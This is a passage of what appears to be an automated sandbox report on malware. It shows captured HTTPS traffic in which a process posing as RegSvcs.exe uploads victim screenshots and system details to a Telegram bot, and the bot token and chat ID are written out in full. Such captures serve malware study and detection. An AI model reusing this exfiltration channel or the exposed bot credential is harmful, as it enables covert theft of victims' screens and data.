[WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:14 UTC	1589	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:14 UTC	1605	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:14 UTC	1620	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:14 UTC	1636	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:14 UTC	1652	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:14 UTC	1668	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:14 UTC	1671	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 38 61 31 62 38 33 38 31 34 2d 2d 0d 0a Data Ascii: -----------------------------8da1978a1b83814--
2022-04-08 10:14:15 UTC	1671	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:15 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":134,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412855,"document":{"file_name":"user-082561 2022-04-08 03-58-32.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4ZiUAr2bjizOEWf1fl3Z7ZXHlzs_wAC-goAAkCUgFI6UUTqh_qVSwEAB20AAyME","file_unique_id":"AQAD-goAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOGYlAK9m44szhFn9X5d2e2Vx5c7P8AAvoKAAJAlIBSOlFE6of6lUsjBA","file_unique_id":"AgAD-goAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.22	49185	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:20 UTC	1672	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da197b6d36fee5 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:20 UTC	1672	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:23 UTC	1672	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 62 36 64 33 36 66 65 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 62 36 64 33 36 66 65 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da197b6d36fee5Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da197b6d36fee5Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:23 UTC	1673	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:23 UTC	1689	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:23 UTC	1705	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:23 UTC	1721	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:23 UTC	1736	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:23 UTC	1752	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:23 UTC	1768	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:23 UTC	1784	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:23 UTC	1786	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 62 36 64 33 36 66 65 65 35 2d 2d 0d 0a Data Ascii: -----------------------------8da197b6d36fee5--
2022-04-08 10:14:23 UTC	1786	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:23 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":135,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412863,"document":{"file_name":"user-082561 2022-04-08 04-18-33.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4diUAr_tVZlvIyqUoSnnoA0_V4FqgAC-woAAkCUgFJq4dI-_nOc0QEAB20AAyME","file_unique_id":"AQAD-woAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOHYlAK_7VWZbyMqlKEp56ANP1eBaoAAvsKAAJAlIBSauHSPv5znNEjBA","file_unique_id":"AgAD-woAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.22	49186	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:26 UTC	1787	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da197e38b4cb02 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:26 UTC	1788	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:26 UTC	1788	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 65 33 38 62 34 63 62 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 65 33 38 62 34 63 62 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da197e38b4cb02Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da197e38b4cb02Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:26 UTC	1789	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 